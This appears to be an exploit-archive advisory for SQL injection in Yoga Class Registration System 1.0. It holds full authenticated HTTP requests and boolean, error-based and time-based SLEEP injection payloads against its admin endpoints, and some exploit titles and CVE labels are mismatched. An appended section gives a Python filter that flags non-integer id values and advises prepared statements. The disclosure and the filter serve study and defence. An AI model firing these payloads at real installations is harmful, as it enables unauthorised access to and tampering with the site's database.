Headline
Yoga Class Registration System 1.0 SQL Injection
Yoga Class Registration System version 1.0 suffers from multiple remote SQL injection vulnerabilities.
# Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# CVE: [CVE-2023-0982]
# Tested on: Windows 11

# Payload
GET /php-ycrs/admin/registrations/update_status.php?id=2'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2
Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

## Payload
'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU

the back-end DBMS is MySQL
web application technology: PHP 8.0.25, Apache 2.4.54
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)

# Exploit Title: Authenticated POST based SQL Injection when delete user on Yoga Class Registration System
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# CVE: ( CVE-2023-0981 )
# Tested on: Windows 11

```
POST /php-ycrs/classes/Master.php?f=delete_class HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6
Origin: http://localhost
Connection: close
Referer: http://localhost/php-ycrs/admin/?page=classes
Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

id=96'
```

# Payload
Parameter: id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: id=96' AND 2307=(SELECT (CASE WHEN (2307=2307) THEN 2307 ELSE (SELECT 8487 UNION SELECT 3172) END))-- -

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=96' AND (SELECT 4409 FROM(SELECT COUNT(*),CONCAT(0x7162707671,(SELECT(ELT(4409=4409,1))),0x71716b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NiQL

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=96' AND (SELECT 9070 FROM (SELECT(SLEEP(5)))jayu)-- wkzQ

# Exploit Title: Authenticated POST based SQL Injection when add class on Yoga Class Registration System
# Google Dork: NA
# Date: 23/2/2023
# Exploit Author: Ahmed Ismail (@MrOz1l)
# Vendor Homepage: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
# Software Link: [download link if available]
# Version: 1.0
# CVE: ( CVE-2023-0982 )
# Tested on: Windows 11

## Payload
POST /php-ycrs/classes/Master.php?f=save_registration HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;boundary=---------------------------408548517113152447833471217322
Content-Length: 286
Origin: http://localhost
Connection: close
Referer: http://localhost/php-ycrs/admin/?page=registrations/view_registration&id=2
Cookie: PHPSESSID=tcc4d9ffr86hm2dqlfmos7amhg
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------408548517113152447833471217322
Content-Disposition: form-data; name="id"

2'
-----------------------------408548517113152447833471217322
Content-Disposition: form-data; name="status"

1
-----------------------------408548517113152447833471217322--

## Payload
'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU

the back-end DBMS is MySQL
web application technology: PHP 8.0.25, Apache 2.4.54
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
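
All three requests above inject through an `id` parameter that should only ever hold an integer, so a strict allow-list check on that one field catches every payload shown. The following is an added example, not part of the original advisory or the vendor's code: a virtual-patch style filter that pulls `id` from the query string, a urlencoded body or a multipart body and flags anything that is not a plain integer. The endpoint paths and sample values come from the requests above; the function names and the 10-digit limit are assumptions.

```python
import re
from email import message_from_bytes
from urllib.parse import parse_qs, urlsplit

MASTER = "/php-ycrs/classes/Master.php"
STATUS = "/php-ycrs/admin/registrations/update_status.php"
# Endpoints from the advisory. None = every request; a set = only these f= actions.
GUARDED = {STATUS: None, MASTER: {"delete_class", "save_registration"}}
INT_ID = re.compile(r"[0-9]{1,10}")  # assumption: ids are short unsigned integers

def extract_ids(query, content_type, body):
    """Collect every `id` value from the query string and the request body."""
    ids = parse_qs(query, keep_blank_values=True).get("id", [])
    ctype = content_type.lower()
    if ctype.startswith("application/x-www-form-urlencoded"):
        ids += parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True).get("id", [])
    elif ctype.startswith("multipart/form-data"):
        # Prepend the header so the stdlib MIME parser learns the boundary.
        msg = message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
        for part in (msg.get_payload() if msg.is_multipart() else []):
            if part.get_param("name", header="content-disposition") == "id":
                value = part.get_payload(decode=True) or b""
                ids.append(value.decode("utf-8", "replace").rstrip("\r\n"))
    return ids

def check_request(method, target, content_type="", body=b""):
    """Return findings for one request; an empty list means it passes."""
    url = urlsplit(target)
    action = parse_qs(url.query).get("f", [None])[0]
    actions = GUARDED.get(url.path, ())
    if actions is not None and action not in actions:
        return []  # not one of the guarded endpoints
    return [f"{method} {url.path}: non-integer id {value!r}"
            for value in extract_ids(url.query, content_type, body)
            if value and not INT_ID.fullmatch(value)]

# Constructed sample traffic, built from the requests shown in the advisory.
BOUNDARY = "-" * 27 + "408548517113152447833471217322"
FORM = "application/x-www-form-urlencoded; charset=UTF-8"
MULTIPART = ("".join(f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
                     for k, v in (("id", "2'"), ("status", "1"))) + f"--{BOUNDARY}--\r\n").encode()
SAMPLES = [
    ("GET", STATUS + "?id=2'+AND+(SELECT+7828+FROM+(SELECT(SLEEP(3)))Mvkn)--+yLjU", "", b""),
    ("POST", MASTER + "?f=delete_class", FORM, b"id=96'"),
    ("POST", MASTER + "?f=save_registration", f"multipart/form-data; boundary={BOUNDARY}", MULTIPART),
    ("POST", MASTER + "?f=delete_class", FORM, b"id=96"),  # benign control
]
```

A filter like this is a stop-gap in front of the application and matches paths exactly, so it must see the path as the web server normalizes it. The fix in the PHP code itself is to cast `id` to an integer and bind it in a prepared statement.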
Related news
A vulnerability was found in SourceCodester Yoga Class Registration System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the component Add Class Entry. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The identifier VDB-221677 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Yoga Class Registration System 1.0. It has been classified as critical. Affected is an unknown function of the component Delete User. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-221676.